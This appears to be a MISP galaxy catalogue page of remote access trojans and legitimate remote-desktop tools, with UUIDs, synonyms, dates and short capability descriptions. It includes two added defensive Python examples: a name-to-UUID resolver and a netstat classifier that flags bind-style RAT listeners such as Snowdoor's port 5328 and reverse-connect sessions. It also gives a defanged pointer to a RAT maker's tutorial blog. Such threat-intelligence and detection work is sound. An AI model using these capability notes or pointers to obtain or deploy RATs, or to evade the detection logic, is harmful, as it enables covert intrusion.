UUID a9caa398-ba8b-4a64-8970-67761c7efc76 which can be used as unique global reference for Offence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Apocalypse

Internal MISP references

UUID d5d3f9de-21b5-482e-b716-5f2f13182990 which can be used as unique global reference for Apocalypse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2009

JCage

Internal MISP references

UUID 0d756293-6cbc-4973-8df8-7d6ab0cd51e0 which can be used as unique global reference for JCage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013

Nuclear RAT

Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).

Internal MISP references

UUID 1b0f4481-f205-493a-a167-59669a64b6fc which can be used as unique global reference for Nuclear RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Ozone

C++ REMOTE CONTROL PROGRAM

Internal MISP references

UUID 1a4d6958-45fe-41ca-b545-bdf28fba14fa which can be used as unique global reference for Ozone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Xanity

Internal MISP references

UUID 66c3e21d-1cb9-43b4-bd1b-2d9ac839a628 which can be used as unique global reference for Xanity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkMoon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkMoon.

Known Synonyms
Dark Moon
Internal MISP references

UUID 18a4e501-c6e3-45e9-beee-25421b0c7bcb which can be used as unique global reference for DarkMoon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
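The synonyms block and the UUID line are the two fields a SOC actually consumes from a galaxy page: an observed tool name has to be matched against every label, not just the cluster name, and the result has to be the UUID so that event tags stay stable when a name changes. The following is an added example, not code from this page or from the MISP project. It parses the plain-text layout used on this page from a constructed sample of four entries copied from the page and resolves observed names to UUIDs. It deliberately returns a list: this page lists NetDevil and Net Devil as separate clusters, and that ambiguity should surface rather than be hidden.

```python
"""Name/synonym -> UUID lookup built from MISP galaxy cluster text.

Added example; not code from this page or from the MISP project. It reads
the plain-text layout used on this page ("Known Synonyms" block, the
"UUID ... which can be used as unique global reference for <name> ..." line,
optional "date" row) and resolves an observed tool name to cluster UUID(s).
"""
import re
from collections import defaultdict

UUID_LINE = re.compile(
    r"^UUID ([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}) "
    r"which can be used as unique global reference for (.+?) in MISP",
    re.IGNORECASE,
)

# Constructed sample: four entries copied from this page, trimmed to the
# lines the parser needs. NetDevil and Net Devil are both kept because the
# page really does list them as separate clusters.
SAMPLE = """\
DarkMoon
Known Synonyms
Dark Moon
Internal MISP references
UUID 18a4e501-c6e3-45e9-beee-25421b0c7bcb which can be used as unique global reference for DarkMoon in MISP communities and other software using the MISP galaxy
BD Y3K RAT
Known Synonyms
Back Door Y3K RAT
Y3k
Internal MISP references
UUID 62f8b6aa-f3df-4789-9348-b16db59f345e which can be used as unique global reference for BD Y3K RAT in MISP communities and other software using the MISP galaxy
date 1998
NetDevil
Internal MISP references
UUID 281563d8-14f8-43a8-a0cb-2f0198f7146c which can be used as unique global reference for NetDevil in MISP communities and other software using the MISP galaxy
Net Devil
Known Synonyms
NetDevil
Internal MISP references
UUID 2be434d3-03df-4236-9e7e-130c2efa8b33 which can be used as unique global reference for Net Devil in MISP communities and other software using the MISP galaxy
date 2002
"""


def normalize(label):
    """Case-fold and keep only letters and digits, so 'Dark Moon',
    'DarkMoon' and 'dark-moon' all map to the same key."""
    return re.sub(r"[^a-z0-9]", "", label.lower())


def parse_clusters(text):
    """Return a list of {name, uuid, synonyms, date} dicts in page order."""
    clusters = []
    pending = []          # synonyms seen before the next UUID line
    in_synonyms = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Known Synonyms":
            in_synonyms = True
            continue
        if line == "Internal MISP references":
            in_synonyms = False
            continue
        if in_synonyms:
            if line:
                pending.append(line)
            continue
        m = UUID_LINE.match(line)
        if m:
            clusters.append({"name": m.group(2), "uuid": m.group(1).lower(),
                             "synonyms": pending, "date": None})
            pending = []
            continue
        if line.startswith("date ") and clusters:
            clusters[-1]["date"] = line[5:]
    return clusters


def build_index(clusters):
    """Map every normalized name and synonym to the UUIDs that claim it.
    A list, not a single value: one label can belong to several clusters,
    and silently keeping the last writer would hide that."""
    index = defaultdict(list)
    for c in clusters:
        for label in [c["name"], *c["synonyms"]]:
            key = normalize(label)
            if c["uuid"] not in index[key]:
                index[key].append(c["uuid"])
    return dict(index)


def resolve(index, observed):
    """All cluster UUIDs an observed tool name could refer to ([] if none)."""
    return index.get(normalize(observed), [])


if __name__ == "__main__":
    idx = build_index(parse_clusters(SAMPLE))
    for seen in ("dark moon", "Y3K", "NetDevil", "AnyDesk"):
        print(seen, "->", resolve(idx, seen) or "no cluster")
```

Keys are reduced to lowercase letters and digits, so vendor spellings such as "Backdoor:Win32/Snowdoor" still match the label as the page writes it. Any key that resolves to more than one UUID should go to an analyst before an event is tagged.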

Xpert

Internal MISP references

UUID bdb25a20-4c6c-4fdb-ac05-5f81fb6c15a7 which can be used as unique global reference for Xpert in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Kiler RAT

This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell, and from stealing credentials stored in browsers to accessing the victim's webcam. Through the Command & Control (CnC) server software, the attacker can create and configure the malware to spread via physical devices such as USB drives, and can use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well-known njRAT, as they share many similar features such as their display style, several abilities and a general template for communication methods. However, where njRAT left off, KilerRat has taken over. KilerRat is a very feature-rich RAT with an active development force that is rapidly gaining in popularity in the Middle East and worldwide.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kiler RAT.

Known Synonyms
Njw0rm
Internal MISP references

UUID c01ef312-dfd6-403f-a8b5-67fc11a550a7 which can be used as unique global reference for Kiler RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Brat

Internal MISP references

UUID 7109e2b0-8c05-4d2b-a37f-c00d799f0c02 which can be used as unique global reference for Brat in MISP communities and other software using the MISP galaxy

MINI-MO

Internal MISP references

UUID 32ea7a67-9649-4bd3-b194-f37f04c208ba which can be used as unique global reference for MINI-MO in MISP communities and other software using the MISP galaxy

Lost Door

Unlike most attack tools, which can only be found in cybercriminal underground markets, Lost Door is very easy to obtain. It is promoted on social media sites like YouTube and Facebook. Its maker, "OussamiO," even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT are found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lost Door.

Known Synonyms
LostDoor
Internal MISP references

UUID 8007f2be-ba4f-445e-8a15-6c2bfe769c49 which can be used as unique global reference for Lost Door in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Loki RAT

Loki RAT is a PHP-based RAT, which means no port forwarding is needed on the operator's side (the implant connects out to a web-hosted PHP controller). A setup tutorial is linked from the tool's distribution page.

Internal MISP references

UUID 70e6875b-34b5-4f97-8403-210defbc040d which can be used as unique global reference for Loki RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

MLRat

Internal MISP references

UUID 83929545-ef07-469c-ab55-c59155a66cc6 which can be used as unique global reference for MLRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SpyCronic

Internal MISP references

UUID 71289654-0217-44d7-8762-b609b3eace80 which can be used as unique global reference for SpyCronic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Internal MISP references

UUID bdb420be-5882-41c8-b439-02bbef69d83f which can be used as unique global reference for Pupy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Nova

Nova is a proof of concept demonstrating screen sharing over UDP hole punching.

Internal MISP references

UUID eea78fd1-11ae-432a-9422-d5e774eb8ff2 which can be used as unique global reference for Nova in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

BD Y3K RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BD Y3K RAT.

Known Synonyms
Back Door Y3K RAT
Y3k
Internal MISP references

UUID 62f8b6aa-f3df-4789-9348-b16db59f345e which can be used as unique global reference for BD Y3K RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

Turkojan

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

Internal MISP references

UUID 29f7cf0f-b422-4966-9298-c8b4cb54deac which can be used as unique global reference for Turkojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2003

TINY

TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.

Internal MISP references

UUID c9fd50a0-35c8-4dfd-baeb-8043182e864c which can be used as unique global reference for TINY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SharK

sharK is an advanced reverse-connecting, firewall-bypassing remote administration tool written in VB6. With sharK you can administer any Windows PC remotely.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SharK.

Known Synonyms
SHARK
Shark
Internal MISP references

UUID ff471870-7c9a-4122-ba89-489fc819660b which can be used as unique global reference for SharK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008

Snowdoor

Backdoor.Snowdoor is a backdoor Trojan horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5328.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Snowdoor.

Known Synonyms
Backdoor.Blizzard
Backdoor.Fxdoor
Backdoor.Snowdoor
Backdoor:Win32/Snowdoor
Internal MISP references

UUID ed4590cd-d636-46bc-a92d-d90b9548db51 which can be used as unique global reference for Snowdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
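ProRat above opens a listening port on the victim and waits for the operator (a bind-style backdoor), sharK advertises reverse connecting to bypass inbound firewall rules, and Snowdoor listens on port 5328 by default. The difference is visible in a netstat -ano snapshot, as the following added example shows; it is not code from this page or from any tool listed here. The snapshot is constructed: port 5328 comes from the Snowdoor entry, while the PIDs, the baseline of expected listeners and the exclusion of ports 80/443 are assumptions to be tuned per host role.

```python
"""Bind versus reverse-connect RAT sessions in a netstat -ano snapshot.

Added example; not code from this page or from any tool it lists. The
netstat lines are constructed. Snowdoor's default port 5328 comes from
this page; the PIDs, the expected-listener baseline and the 80/443
exclusion are assumptions to tune per host role.
"""
import re
from collections import defaultdict

# Ports a typical Windows host is expected to accept connections on (assumed).
EXPECTED_LISTEN_PORTS = {135, 139, 445, 3389}

# Listener defaults documented on this page.
KNOWN_RAT_PORTS = {5328: "Snowdoor default listener"}

# Windows "netstat -ano" TCP rows: proto, local, remote, state, PID.
TCP_ROW = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")

# Constructed snapshot: PID 3312 accepts inbound on 5328 (bind model, as
# ProRat and Snowdoor do), PID 3500 listens on an unknown port, PID 4480
# holds two outbound sessions to the same high port (reverse model, as
# sharK advertises); the rest is ordinary noise.
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:5328           0.0.0.0:0              LISTENING       3312
  TCP    0.0.0.0:8099           0.0.0.0:0              LISTENING       3500
  TCP    127.0.0.1:49672        0.0.0.0:0              LISTENING       1120
  TCP    10.0.0.15:49801        203.0.113.7:4444       ESTABLISHED     4480
  TCP    10.0.0.15:49802        203.0.113.7:4444       ESTABLISHED     4480
  TCP    10.0.0.15:49900        198.51.100.20:443      ESTABLISHED     2200
"""


def parse_netstat(text):
    """Return one dict per TCP row; UDP and header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = TCP_ROW.match(line)
        if m:
            lhost, lport, rhost, rport, state, pid = m.groups()
            rows.append({"lhost": lhost, "lport": int(lport), "rhost": rhost,
                         "rport": int(rport), "state": state, "pid": int(pid)})
    return rows


def classify(rows):
    """Findings per PID.

    'bind': the process accepts inbound connections on a routable interface
    on a port outside the baseline (this is what inbound firewalling stops,
    and why later RATs moved to reverse connections).
    'reverse': the process holds outbound sessions on a port that is not
    plain web traffic; repeated sessions to one endpoint are the reconnect
    pattern of a reverse-connect implant. An HTTP-polling implant such as
    Loki RAT would pass this check, so egress filtering or proxy logs are
    still needed for that model.
    """
    findings = defaultdict(list)
    outbound = defaultdict(int)
    for r in rows:
        if r["state"] == "LISTENING":
            if r["lhost"] in ("127.0.0.1", "::1"):
                continue  # loopback-only, not reachable from the network
            if r["lport"] in KNOWN_RAT_PORTS:
                findings[r["pid"]].append(
                    f"bind: {KNOWN_RAT_PORTS[r['lport']]} on port {r['lport']}")
            elif r["lport"] not in EXPECTED_LISTEN_PORTS:
                findings[r["pid"]].append(
                    f"bind: unexpected listener on port {r['lport']}")
        elif r["state"] == "ESTABLISHED" and r["rport"] not in (80, 443):
            outbound[(r["pid"], r["rhost"], r["rport"])] += 1
    for (pid, rhost, rport), n in sorted(outbound.items()):
        findings[pid].append(f"reverse: {n} session(s) to {rhost}:{rport}")
    return dict(findings)


if __name__ == "__main__":
    for pid, notes in classify(parse_netstat(SAMPLE_NETSTAT)).items():
        print(pid, notes)
```

The 80/443 exclusion is exactly what lets an HTTP-polling design such as Loki RAT's PHP controller through, which is the practical point: ingress filtering defeats the bind model, while the reverse model has to be caught on egress (proxy logs, destination reputation, beacon timing).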

Paradox

Internal MISP references

UUID 5d4123f6-c344-45ee-83e9-c5656d38e604 which can be used as unique global reference for Paradox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SpyNote

Android RAT

Internal MISP references

UUID ea727e26-b3de-44f8-86c5-11a912c7a8aa which can be used as unique global reference for SpyNote in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

ZOMBIE SLAYER

Internal MISP references

UUID b7b6db54-db6a-463c-a2a2-3a0da1f7fe32 which can be used as unique global reference for ZOMBIE SLAYER in MISP communities and other software using the MISP galaxy

HTTP WEB BACKDOOR

Internal MISP references

UUID 69b002ee-1be8-44e2-9295-8299b97a5773 which can be used as unique global reference for HTTP WEB BACKDOOR in MISP communities and other software using the MISP galaxy

NET-MONITOR PRO

Net Monitor for Employees lets you see what everyone is doing without leaving your desk. Monitor the activity of all employees. You can also share your screen with your employees' PCs, making demos and presentations much easier.

Internal MISP references

UUID 376671ff-2131-4150-b1f4-7870f6adf8ae which can be used as unique global reference for NET-MONITOR PRO in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DameWare Mini Remote Control

Affordable remote control software for all your customer support and help desk needs.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DameWare Mini Remote Control.

Known Synonyms
dameware
Internal MISP references

UUID ba157c90-8f94-45f2-8395-001e76eee506 which can be used as unique global reference for DameWare Mini Remote Control in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Remote Utilities

Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.

Internal MISP references

UUID 903846e2-5fa7-42c9-98bf-00d05473c9e3 which can be used as unique global reference for Remote Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Ammyy Admin

Ammyy Admin is a completely portable remote access program that's extremely simple to setup. It works by connecting one computer to another via an ID supplied by the program.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ammyy Admin.

Known Synonyms
Ammyy
Internal MISP references

UUID 9025f09b-a3fe-4711-89b8-bee6037681f8 which can be used as unique global reference for Ammyy Admin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011

Ultra VNC

UltraVNC works a bit like Remote Utilities: a server and a viewer are installed on two PCs, and the viewer is used to control the server.

Internal MISP references

UUID 12f03025-467b-49b3-ba7b-2a152e38eae5 which can be used as unique global reference for Ultra VNC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

AeroAdmin

AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.

Internal MISP references

UUID 6dd8f7ac-a90b-4155-843d-b95f1f4e0e81 which can be used as unique global reference for AeroAdmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Windows Remote Desktop

Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.

Internal MISP references

UUID 07c792c4-2f78-4eba-a6a3-3ba28e098886 which can be used as unique global reference for Windows Remote Desktop in MISP communities and other software using the MISP galaxy

RemotePC

RemotePC, for good or bad, is a more simple free remote desktop program. You're only allowed one connection (unless you upgrade) but for many of you, that'll be just fine.

Internal MISP references

UUID e4ae4f4e-a751-4633-a54e-c747508ff3b8 which can be used as unique global reference for RemotePC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Seecreen

Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that's absolutely perfect for on-demand, instant support.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Seecreen.

Known Synonyms
Firnass
Internal MISP references

UUID b9df1fb3-17b7-430b-8c23-f1d321c1265c which can be used as unique global reference for Seecreen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Chrome Remote Desktop

Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you set up a computer for remote access from any other Chrome browser.

Internal MISP references

UUID 6583d982-a5cb-47e0-a3b0-bc18cadaeb53 which can be used as unique global reference for Chrome Remote Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

AnyDesk

AnyDesk is a remote desktop program that you can run portably or install like a regular program.

Internal MISP references

UUID 7d71d21e-68f0-4595-beee-7c353471463d which can be used as unique global reference for AnyDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

LiteManager

LiteManager is another remote access program, and it is strikingly similar to Remote Utilities. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.

Internal MISP references

UUID 0c8a877b-6c9c-43a7-9688-d90a098d8710 which can be used as unique global reference for LiteManager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Comodo Unite

Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.

Internal MISP references

UUID 9b990bc7-ff88-4658-90de-806711462c55 which can be used as unique global reference for Comodo Unite in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

ShowMyPC

ShowMyPC is a portable and free remote access program that's nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.

Internal MISP references

UUID 185adc84-ad02-4559-aacc-50b2d690640c which can be used as unique global reference for ShowMyPC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

join.me

join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.

Internal MISP references

UUID 204b457d-9729-460b-991b-943171c55fa7 which can be used as unique global reference for join.me in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DesktopNow

DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.

Internal MISP references

UUID 82a2bcba-0f31-4a45-bddb-559db9819fad which can be used as unique global reference for DesktopNow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BeamYourScreen

Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter's screen.

Internal MISP references

UUID a31bf7d6-70a9-4f5f-a38e-88e173ad444c which can be used as unique global reference for BeamYourScreen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Casa RAT

Internal MISP references

UUID ef164438-e4bd-4c56-a8e6-e5e64bc8dd5a which can be used as unique global reference for Casa RAT in MISP communities and other software using the MISP galaxy

Bandook RAT

Bandook is a FWB#++ reverse-connection RAT (Remote Administration Tool) with a server of only about 30 KB when packed and a long list of features.

Internal MISP references

UUID 3482922d-b58c-482f-8363-f63f52fcdb43 which can be used as unique global reference for Bandook RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2005

Cerberus RAT

Internal MISP references

UUID 180145d0-f4e3-4ab3-b5bb-ce17f7fec0db which can be used as unique global reference for Cerberus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2009

Syndrome RAT

Internal MISP references

UUID db9bcc9a-27ec-4a58-a481-d978b4954ad7 which can be used as unique global reference for Syndrome RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Snoopy

Snoopy is a Remote Administration Tool: software for controlling a user's computer remotely from another computer on a local network or the Internet.

Internal MISP references

UUID fffbcd87-f028-4c4a-9e94-312e4e954450 which can be used as unique global reference for Snoopy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

5p00f3r.N$ RAT

Internal MISP references

UUID f592c850-4867-4fa1-a303-151b953710d7 which can be used as unique global reference for 5p00f3r.N$ RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

P. Storrie RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular P. Storrie RAT.

Known Synonyms
P.Storrie RAT
Internal MISP references

UUID 9287c2db-99e6-4d3b-bb32-3054e2e96e39 which can be used as unique global reference for P. Storrie RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2011

xHacker Pro RAT

Internal MISP references

UUID 832dad3c-6483-4d3c-ad02-8336dea90682 which can be used as unique global reference for xHacker Pro RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2007

NetDevil

Backdoor.NetDevil allows a hacker to remotely control an infected computer.

Internal MISP references

UUID 281563d8-14f8-43a8-a0cb-2f0198f7146c which can be used as unique global reference for NetDevil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

NanoCore

In September of 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end of day credit card transactions. This system also had the capability of connecting to the corporate network which contained company sales reports. DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update, was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.

Internal MISP references

UUID 6c3c111a-93af-428a-bee0-feacbee0237d which can be used as unique global reference for NanoCore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Cobian RAT

The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had a lot of similarities to the njRAT/H-Worm family.

Internal MISP references

UUID 8c49da10-2b59-42c4-81e6-75556decdecb which can be used as unique global reference for Cobian RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

Netsupport Manager

NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.

Internal MISP references

UUID d6fe0674-f55b-46ea-bf87-78fa0fa6ac97 which can be used as unique global reference for Netsupport Manager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1989

VorteX

Internal MISP references

UUID 2a47361d-584b-493f-80a4-37c74c30cf1b which can be used as unique global reference for VorteX in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 1998

Assassin

Internal MISP references

UUID eac2e921-d71e-45fd-abff-4902968f910d which can be used as unique global reference for Assassin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2002

Net Devil

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Net Devil.

Known Synonyms
NetDevil
Internal MISP references

UUID 2be434d3-03df-4236-9e7e-130c2efa8b33 which can be used as unique global reference for Net Devil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

A4Zeta

Internal MISP references

UUID 9a0b6acf-e913-446a-a4cd-35eb9046febe which can be used as unique global reference for A4Zeta in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Greek Hackers RAT

Internal MISP references

UUID 77e7ad24-3412-4536-ae4c-1971317f4231 which can be used as unique global reference for Greek Hackers RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

MRA RAT

Internal MISP references

UUID de4974d1-1a1b-4a67-835b-172ebbdcfafd which can be used as unique global reference for MRA RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Sparta RAT

Internal MISP references

UUID c1086221-a498-4ec9-ac33-85e4790136ae which can be used as unique global reference for Sparta RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

LokiTech

Internal MISP references

UUID ff97af70-011c-4d7c-9ae6-1e41ea5dfc12 which can be used as unique global reference for LokiTech in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2003

MadRAT

Internal MISP references

UUID 5c65f5ec-c629-4d12-9078-08a4bb7522eb which can be used as unique global reference for MadRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2002

Tequila Bandita

Internal MISP references

UUID 831879d3-5492-46b1-b174-491e6b413232 which can be used as unique global reference for Tequila Bandita in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004

Toquito Bandito

Internal MISP references

UUID 79861bda-8c72-4b90-876e-854b9daf32eb which can be used as unique global reference for Toquito Bandito in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004

MofoTro

MofoTro is a new rat coded by Cool_mofo_2.

Internal MISP references

UUID fa0a7929-3876-4866-9c01-a5d168379816 which can be used as unique global reference for MofoTro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2006

Hav-RAT

Written in Delphi

Internal MISP references

UUID 3a2176f2-138d-4939-958c-70992abddca3 which can be used as unique global reference for Hav-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007

ComRAT

ComRAT is a remote access tool suspected of being a descendant of Agent.btz and used by Turla.

Internal MISP references

UUID 9223bf17-7e32-4833-9574-9ffd8c929765 which can be used as unique global reference for ComRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007
Related clusters

To see the related clusters, click here.

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007.

Internal MISP references

UUID d8aad68d-a68f-42e1-b755-d5f383b73401 which can be used as unique global reference for 4H RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007
Related clusters

To see the related clusters, click here.

Darknet RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Darknet RAT.

Known Synonyms
Dark NET RAT
Internal MISP references

UUID ba285e93-d330-4efc-ad00-a84433575e2c which can be used as unique global reference for Darknet RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007

CIA RAT

Internal MISP references

UUID b82d0ec7-3918-4252-9c8f-b4d17b14c596 which can be used as unique global reference for CIA RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

Minimo

Internal MISP references

UUID 71a72669-4d7b-49a5-95a3-bbefbb2152bf which can be used as unique global reference for Minimo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

miniRAT

Internal MISP references

UUID 2b640955-05d4-46f7-9b34-c697f4e927e4 which can be used as unique global reference for miniRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

Pain RAT

Internal MISP references

UUID 17958627-0c27-4536-8839-5c91d51866bc which can be used as unique global reference for Pain RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

PlugX

PLUGX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PlugX.

Known Synonyms
Korplug
SOGU
Scontroller
Internal MISP references

UUID 663f8ef9-4c50-499a-b765-f377d23c1070 which can be used as unique global reference for PlugX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2005 or 2008
Related clusters

To see the related clusters, click here.

UNITEDRAKE

The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.

Internal MISP references

UUID 41d4b98f-8ec2-4e8d-938c-42a776b422ee which can be used as unique global reference for UNITEDRAKE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008

MegaTrojan

Written in Visual Basic

Internal MISP references

